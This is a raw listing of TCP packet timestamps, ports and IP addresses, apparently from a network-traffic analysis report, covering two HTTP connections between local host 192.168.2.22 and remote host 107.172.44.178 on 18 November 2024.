                                                                                                                                                  Nov 18, 2024 18:21:34.330111980 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.330163002 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.330163002 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.330671072 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.330677032 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.330743074 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.331044912 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.331051111 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.331064939 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.331110954 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.331110954 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.331749916 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.331756115 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.331811905 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.385993004 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.386113882 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.386121988 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.386231899 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.386231899 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.386449099 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.386514902 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.445914984 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.446047068 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.446053982 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.446054935 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.446103096 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.446507931 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.446521044 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.446572065 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.447027922 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.447035074 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.447046995 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.447088957 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.447125912 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.447657108 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.447719097 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.447776079 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.447782040 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.447794914 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.447849035 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.448600054 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.448607922 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.448616982 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.448664904 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.502973080 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.503097057 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.503103971 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.503151894 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.503151894 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.545309067 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.545406103 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.545414925 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.545434952 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.545486927 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.545486927 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.565561056 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.565676928 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.565696955 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.565774918 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.565774918 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.566140890 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.566183090 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.566230059 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.566230059 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.566884995 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.566891909 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.566948891 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.567027092 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.567118883 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:38.284362078 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:43.129004955 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:43.134077072 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:43.134169102 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:43.137197971 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:43.142214060 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:43.833477020 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:43.833553076 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:43.833570004 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:43.833590984 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:43.833612919 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:43.833631039 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:43.833975077 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:43.834009886 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:43.834017992 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:43.834049940 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:43.834064007 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:43.834104061 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:43.834634066 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:43.834670067 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:43.834681988 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:43.834705114 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:43.834706068 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:43.834743023 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:43.834749937 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:43.834784031 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:43.838640928 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:43.838682890 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:43.838730097 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:43.838766098 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:43.838809967 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:43.950368881 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:43.950540066 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:43.950546026 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:43.950581074 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:43.950597048 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:43.950628996 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:43.950833082 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:43.950884104 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:43.951018095 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:43.951052904 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:43.951076031 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:43.951090097 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:43.951093912 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:43.951139927 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:43.951783895 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:43.951822996 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:43.951837063 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:43.951869011 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:43.952092886 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:43.952135086 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:43.952156067 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:43.952182055 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:43.952550888 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:43.952601910 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:43.952611923 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:43.952646971 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.067740917 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.067840099 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.067877054 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.067878008 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.067919970 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.067919970 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.068254948 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.068290949 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.068320990 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.068340063 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.068589926 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.068624020 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.068639994 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.068660021 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.068666935 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.068707943 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.069144964 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.069179058 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.069210052 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.069217920 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.069494009 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.069549084 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.069565058 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.069583893 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.069586992 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.069628954 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.184911966 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.185039997 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.185054064 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.185065985 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.185100079 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.185415983 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.185461998 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.185555935 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.185611010 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.185904980 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.185915947 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.185926914 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.185952902 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.185967922 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.186474085 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.186486006 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.186527014 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.186934948 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.186983109 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.225334883 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.225425959 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.225438118 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.225449085 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.225480080 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.225616932 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.225652933 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.301852942 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.301872015 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.301883936 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.301918983 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.301950932 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.302294970 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.302308083 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.302346945 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.302707911 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.302721024 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.302757025 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.303292036 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.303303957 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.303345919 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.303898096 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.303910017 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.303920984 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.303950071 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.303960085 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.304708958 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.304759979 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.341803074 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.341886044 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.341934919 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.341948986 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.341973066 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.341985941 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.644862890 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.644953966 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.644959927 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.644973993 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.645004988 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.645184994 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.645226955 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.645231962 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.645246029 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.645263910 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.645278931 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.646024942 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.646039009 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.646050930 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.646064043 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.646074057 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.646100998 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.646100998 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.646811962 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.646825075 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.646836042 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.646846056 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.646863937 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.646884918 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.647608042 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.647653103 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.649132013 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.649146080 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.649157047 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.649183989 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.649205923 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.652064085 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.652076960 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.652087927 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.652120113 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.652261972 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.652872086 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.652915001 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.652926922 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.652939081 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.652941942 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.652947903 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.652952909 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.652966022 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.652978897 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.653704882 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.653717041 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.653727055 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.653739929 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.653752089 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.653760910 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.653776884 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.653776884 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.654512882 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.654525042 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.654536963 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.654547930 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.654561996 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.654567003 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.654573917 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.654604912 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.655364990 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.655374050 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.655386925 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.655396938 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.655406952 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.655406952 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.655411005 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.655420065 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.655431032 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.655443907 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.656158924 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.656172037 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.656183958 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.656193972 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.656203032 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.656203032 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.656208992 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.656215906 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.656230927 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.656241894 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.656981945 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.656996012 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.657006979 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.657018900 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.657021999 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.657032013 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.657036066 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.657036066 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.657051086 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.657063007 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.657804966 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.657820940 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.657831907 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.657845020 CET8049165107.172.44.178192.168.2.22
